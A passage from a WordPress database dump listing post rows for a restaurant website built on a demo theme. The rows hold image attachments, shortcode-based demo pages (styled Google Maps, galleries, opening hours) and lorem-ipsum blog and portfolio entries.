14:13:54','','h3-img-gallery-8','','inherit','open','closed','','h3-img-gallery-8','','','2018-08-10 14:13:54','2018-08-10 14:13:54','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h3-img-gallery-8.jpg',0,'attachment','image/jpeg',0),(1828,1,'2018-08-21 12:27:58','2018-08-21 12:27:58','','h5-img-3','','inherit','open','closed','','h5-img-3','','','2018-08-21 12:27:58','2018-08-21 12:27:58','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-3.jpg',0,'attachment','image/jpeg',0),(1449,1,'2018-08-16 10:32:13','2018-08-16 10:32:13','','h1-blog-post-2','','inherit','open','closed','','h1-blog-post-2','','','2018-08-16 10:32:13','2018-08-16 10:32:13','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-blog-post-2.jpg',0,'attachment','image/jpeg',0),(4340,1,'2018-08-10 14:47:10','2018-08-10 14:47:10','','h4-rev-img-2','','inherit','open','closed','','h4-rev-img-2','','','2018-08-10 14:47:10','2018-08-10 14:47:10','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h4-rev-img-2.jpg',0,'attachment','image/jpeg',0),(4341,1,'2018-08-14 13:51:22','2018-08-14 13:51:22','','h5-img-6','','inherit','open','closed','','h5-img-6','','','2018-08-14 13:51:22','2018-08-14 13:51:22','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-6.jpg',0,'attachment','image/jpeg',0),(4342,1,'2018-08-13 08:50:18','2018-08-13 08:50:18','','h2-port-img-4a','','inherit','open','closed','','h2-port-img-4a','','','2018-08-13 08:50:18','2018-08-13 08:50:18','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-port-img-4a.jpg',0,'attachment','image/jpeg',0),(1591,1,'2018-08-17 13:04:37','2018-08-17 13:04:37','','h2-rev-img-1','','inherit','open','closed','','h2-rev-img-1','','','2018-08-17 13:04:37','2018-08-17 13:04:37','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-rev-img-1.jpg',0,'attachment','image/jpeg',0),(1901,1,'2018-08-22 07:33:38','2018-08-22 07:33:38','','port-single-img-1a','','inherit','open','closed','','port-single-img-1a','','','2018-08-22 07:33:38','2018-08-22 07:33:38','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/port-single-img-1a.jpg',0,'attachment','image/jpeg',0),(4343,1,'2018-08-14 13:51:26','2018-08-14 13:51:26','','h5-img-8','','inherit','open','closed','','h5-img-8','','','2018-08-14 13:51:26','2018-08-14 13:51:26','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h5-img-8.jpg',0,'attachment','image/jpeg',0),(1642,1,'2018-08-17 14:45:38','2018-08-17 14:45:38','[vc_row row_content_width=\"grid\" css=\".vc_custom_1534517315799{padding-bottom: 120px !important;}\"][vc_column width=\"1/2\"][mkdf_google_map snazzy_map_style=\"yes\" address1=\"Brit Sec Limited, 99 Bishopsgate, London EC2M 3XD, UK\" zoom=\"18\" map_height=\"345\" pin=\"224\" snazzy_map_code=\"`{`\n{\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``elementType``: ``labels.icon``,\n``stylers``: `{`\n{\n``visibility``: ``off``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.stroke``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``featureType``: ``administrative.land_parcel``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#bdbdbd``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``road``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#ffffff``\n}\n`}`\n},\n{\n``featureType``: ``road.arterial``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#dadada``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``featureType``: ``road.local``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``transit.line``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``transit.station``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#c9c9c9``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n}\n`}`\"][/vc_column][vc_column width=\"1/2\"][mkdf_google_map snazzy_map_style=\"yes\" address1=\"Brit Sec Limited, 99 Bishopsgate, London EC2M 3XD, UK\" zoom=\"16\" map_height=\"345\" pin=\"224\" snazzy_map_code=\"`{`\n{\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``elementType``: ``labels.icon``,\n``stylers``: `{`\n{\n``visibility``: ``off``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.stroke``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``featureType``: ``administrative.land_parcel``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#bdbdbd``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``road``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#ffffff``\n}\n`}`\n},\n{\n``featureType``: ``road.arterial``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#dadada``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``featureType``: ``road.local``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``transit.line``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``transit.station``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#c9c9c9``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n}\n`}`\"][/vc_column][/vc_row][vc_row row_content_width=\"grid\"][vc_column][mkdf_google_map snazzy_map_style=\"yes\" address1=\"Brit Sec Limited, 99 Bishopsgate, London EC2M 3XD, UK\" zoom=\"18\" map_height=\"345\" pin=\"224\" snazzy_map_code=\"`{`\n{\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``elementType``: ``labels.icon``,\n``stylers``: `{`\n{\n``visibility``: ``off``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``elementType``: ``labels.text.stroke``,\n``stylers``: `{`\n{\n``color``: ``#f5f5f5``\n}\n`}`\n},\n{\n``featureType``: ``administrative.land_parcel``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#bdbdbd``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``poi``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``poi.park``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``road``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#ffffff``\n}\n`}`\n},\n{\n``featureType``: ``road.arterial``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#757575``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#dadada``\n}\n`}`\n},\n{\n``featureType``: ``road.highway``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#616161``\n}\n`}`\n},\n{\n``featureType``: ``road.local``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n},\n{\n``featureType``: ``transit.line``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#e5e5e5``\n}\n`}`\n},\n{\n``featureType``: ``transit.station``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#eeeeee``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``geometry``,\n``stylers``: `{`\n{\n``color``: ``#c9c9c9``\n}\n`}`\n},\n{\n``featureType``: ``water``,\n``elementType``: ``labels.text.fill``,\n``stylers``: `{`\n{\n``color``: ``#9e9e9e``\n}\n`}`\n}\n`}`\"][/vc_column][/vc_row]','Google Maps','','publish','closed','closed','','google-maps','','','2018-08-17 14:45:38','2018-08-17 14:45:38','',3039,'http://attika.mikado-themes.com/?page_id=1642',0,'page','',0),(1650,1,'2018-08-17 15:08:07','2018-08-17 15:08:07','<p>[vc_row][vc_column][mkdf_image_gallery type=\"masonry\" enable_image_shadow=\"no\" image_behavior=\"custom-link\" number_of_columns=\"four\" space_between_items=\"normal\" images=\"970,971,972,973\" image_size=\"full\" custom_links=\"http://attika.mikado-themes.com/portfolio-item/h1-1/, http://attika.mikado-themes.com/portfolio-item/h1-2/, http://attika.mikado-themes.com/portfolio-item/h1-3/, http://attika.mikado-themes.com/portfolio-item/h1-4/\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1534518584017{padding-top: 30px !important;}\"][vc_column][mkdf_image_gallery type=\"masonry\" enable_image_shadow=\"no\" image_behavior=\"custom-link\" number_of_columns=\"four\" space_between_items=\"normal\" images=\"988,989,990,991\" image_size=\"full\" custom_links=\"http://attika.mikado-themes.com/portfolio-item/h1-1/, http://attika.mikado-themes.com/portfolio-item/h1-2/, http://attika.mikado-themes.com/portfolio-item/h1-3/, http://attika.mikado-themes.com/portfolio-item/h1-4/\"][/vc_column][/vc_row]</p>\n','Image Gallery','','publish','closed','closed','','image-gallery','','','2018-08-17 15:08:07','2018-08-17 15:08:07','',3039,'http://attika.mikado-themes.com/?page_id=1650',0,'page','',0),(1658,1,'2018-08-17 15:19:53','2018-08-17 15:19:53','[mkdf_checker_box_circle_info icon_pack=\"linea_icons\" linea_icon=\"icon-basic-clock\" button_target=\"_self\" button_text=\"book a table\" left_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum ligula, fringilla egestas dolor lobortis vel. Praesent eget elementum.\" left_content_background_color=\"#f8f2ed\" right_content=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Duis congue condimentum.\" right_content_background_color=\"#fef8f7\" title_top=\"Lunch:\" text_top=\"Tuesday to Saturday\n12pm - 2:30pm (last order)\" title_bottom=\"Dinner:\" text_bottom=\"Tuesday to Saturday\n6pm - 10:30pm (last order)\" button_link=\"#\" left_content_padding=\"123px 26% 118px 14%\" right_content_padding=\"123px 18% 118px 25%\"]','Checker Box','','publish','closed','closed','','checker-box','','','2018-08-17 15:19:53','2018-08-17 15:19:53','',3039,'http://attika.mikado-themes.com/?page_id=1658',0,'page','',0),(1662,1,'2018-08-17 15:24:21','2018-08-17 15:24:21','[vc_row row_content_width=\"grid\"][vc_column][mkdf_blog_list type=\"standard\" space_between_items=\"small\" orderby=\"date\" order=\"ASC\" image_size=\"full\" number_of_posts=\"4\" category=\"healthy\"][/vc_column][/vc_row]','Blog List','','publish','closed','closed','','blog-list','','','2018-08-17 15:24:21','2018-08-17 15:24:21','',3039,'http://attika.mikado-themes.com/?page_id=1662',0,'page','',0),(1670,1,'2018-08-20 10:55:08','2018-08-20 10:55:08','[vc_row css=\".vc_custom_1532952122446{padding-top: 15px !important;}\"][vc_column][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh et.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','Big Chefs Recomend','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.','publish','open','open','','big-chefs-recomend','','','2018-08-20 10:55:08','2018-08-20 10:55:08','',0,'http://attika.mikado-themes.com/?p=1670',0,'post','',3),(1671,1,'2018-08-20 10:58:27','2018-08-20 10:58:27','[vc_row css=\".vc_custom_1532952122446{padding-top: 15px !important;}\"][vc_column][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh et.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','Daily menu & drinks','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.','publish','open','open','','daily-menu-drinks','','','2018-08-20 10:58:27','2018-08-20 10:58:27','',0,'http://attika.mikado-themes.com/?p=1671',0,'post','',3),(2938,1,'2018-09-17 10:58:48','2018-09-17 10:58:48','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus.[/vc_column_text][/vc_column][/vc_row]','Green Magic','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','green-magic-2','','','2018-09-17 10:58:48','2018-09-17 10:58:48','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2938',0,'portfolio-item','',0),(2939,1,'2018-09-17 11:00:40','2018-09-17 11:00:40','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos.[/vc_column_text][vc_empty_space height=\"20px\"][vc_column_text]Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit. Class aptent taciti sociosqu ad litora torquent.[/vc_column_text][/vc_column][/vc_row]','Tuna Salad','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','tuna-salad-2','','','2018-09-17 11:00:40','2018-09-17 11:00:40','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2939',0,'portfolio-item','',0),(1679,1,'2018-08-20 09:37:33','2018-08-20 07:37:33','','Right Sidebar','','draft','closed','closed','','right-sidebar','','','2020-12-05 17:55:27','2020-12-05 16:55:27','',0,'http://attika.mikado-themes.com/?page_id=1679',0,'page','',0),(2934,1,'2018-09-17 10:58:30','2018-09-17 10:58:30','[vc_row][vc_column][vc_column_text]\n<h3 style=\"margin-top: 0;\">crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus.[/vc_column_text][/vc_column][/vc_row]','Home Salad','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','home-salad-2','','','2018-09-17 10:58:30','2018-09-17 10:58:30','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2934',0,'portfolio-item','',0),(2935,1,'2018-09-17 10:58:32','2018-09-17 10:58:32','[vc_row][vc_column][vc_column_text]\n<h3>crispy\nsesame\ncake</h3>\n[/vc_column_text][vc_empty_space height=\"19px\"][vc_column_text]Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.[/vc_column_text][/vc_column][/vc_row]','Vegetable Cream Soup','Lorem Ipsum. Proin gravida nibhc vel velit auctor aliquet. Aenean sollicitudin, lorem quis bibendum auctor. Sem nibh id elit. Duis sed odio sit amet nibh vulputate cursus a sit amet mauris. Morbi accumsan ipsum velit. Nam nec tellus a odio tincidunt auctor ornare odio. Sed non mauris vitae erat consequat auctor eu in elit.','publish','open','closed','','vegetable-cream-soup-2','','','2018-09-17 10:58:32','2018-09-17 10:58:32','',0,'http://attika.mikado-themes.com/?post_type=portfolio-item&amp;p=2935',0,'portfolio-item','',0),(2764,1,'2018-09-05 08:08:05','2018-09-05 08:08:05','','landing-img-6','','inherit','open','closed','','landing-img-6','','','2018-09-05 08:08:05','2018-09-05 08:08:05','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/09/landing-img-6.jpg',0,'attachment','image/jpeg',0),(1462,1,'2018-08-16 10:42:04','2018-08-16 10:42:04','[vc_row css=\".vc_custom_1532952122446{padding-top: 15px !important;}\"][vc_column][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh et.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','How to be healthier with a balanced plate','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.','publish','open','open','','how-to-be-healthier-with-a-balanced-plate','','','2018-08-16 10:42:04','2018-08-16 10:42:04','',0,'http://attika.mikado-themes.com/?p=1462',0,'post','',0),(1454,1,'2018-08-16 10:37:59','2018-08-16 10:37:59','[vc_row css=\".vc_custom_1532952122446{padding-top: 15px !important;}\"][vc_column][vc_column_text]Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh. Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Donec sodales sagittis magna. Sed consequat, leo eget bibendum sodales, augue velit cursus nunc. Quisque rutrum. Aenean imperdiet. Etiam ultricies nisi vel augue. Curabitur ullamcorper ultricies nisi. Nam eget dui aenean commodo ligula eget dolor. Etiam sit amet orci eget eros faucibus tincidunt. Duis leo. Sed fringilla mauris sit amet nibh et.[/vc_column_text][vc_empty_space height=\"17px\"][vc_column_text]Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor.[/vc_column_text][vc_empty_space height=\"40px\"][/vc_column][/vc_row]','Great recipes & the chef’s recommendations','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum.','publish','open','open','','great-recipes-the-chefs-recommendations','','','2018-08-16 10:37:59','2018-08-16 10:37:59','',0,'http://attika.mikado-themes.com/?p=1454',0,'post','',0),(1,1,'2018-07-25 08:07:57','2018-07-25 08:07:57','Welcome to WordPress. This is your first post. Edit or delete it, then start writing!','Hello world!','','publish','open','open','','hello-world','','','2018-07-25 08:07:57','2018-07-25 08:07:57','',0,'http://attika.mikado-themes.com/?p=1',0,'post','',1),(4344,1,'2018-08-13 09:55:32','2018-08-13 09:55:32','','h6-img-1a','','inherit','open','closed','','h6-img-1a','','','2018-08-13 09:55:32','2018-08-13 09:55:32','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h6-img-1a.jpg',0,'attachment','image/jpeg',0),(1450,1,'2018-08-16 10:32:23','2018-08-16 10:32:23','','h1-blog-post-3','','inherit','open','closed','','h1-blog-post-3','','','2018-08-16 10:32:23','2018-08-16 10:32:23','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-blog-post-3.jpg',0,'attachment','image/jpeg',0),(1902,1,'2018-08-22 07:33:41','2018-08-22 07:33:41','','port-single-img-2a','','inherit','open','closed','','port-single-img-2a','','','2018-08-22 07:33:41','2018-08-22 07:33:41','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/07/port-single-img-2a.jpg',0,'attachment','image/jpeg',0),(1447,1,'2018-08-16 10:32:10','2018-08-16 10:32:10','','h1-blog-post-1','','inherit','open','closed','','h1-blog-post-1','','','2018-08-16 10:32:10','2018-08-16 10:32:10','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h1-blog-post-1.jpg',0,'attachment','image/jpeg',0),(4333,1,'2018-08-13 08:50:12','2018-08-13 08:50:12','','h2-port-img-2a','','inherit','open','closed','','h2-port-img-2a','','','2018-08-13 08:50:12','2018-08-13 08:50:12','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h2-port-img-2a.jpg',0,'attachment','image/jpeg',0),(1388,1,'2018-08-15 13:51:54','2018-08-15 13:51:54','','pin-img-2','','inherit','open','closed','','pin-img-2','','','2018-08-15 13:51:54','2018-08-15 13:51:54','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/pin-img-2.png',0,'attachment','image/png',0),(4306,1,'2018-08-10 11:26:43','2018-08-10 11:26:43','','logo-light','','inherit','open','closed','','logo-light','','','2018-08-10 11:26:43','2018-08-10 11:26:43','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/logo-light.png',0,'attachment','image/png',0),(4307,1,'2018-08-13 09:55:49','2018-08-13 09:55:49','','h6-img-5a','','inherit','open','closed','','h6-img-5a','','','2018-08-13 09:55:49','2018-08-13 09:55:49','',0,'https://www.ristorantesolymar.it/wp-content/uploads/2018/08/h6-img-5a.jpg',0,'attachment','image/jpeg',0),(4308,1,'2018-08-14 13:51:29','2018-08-14 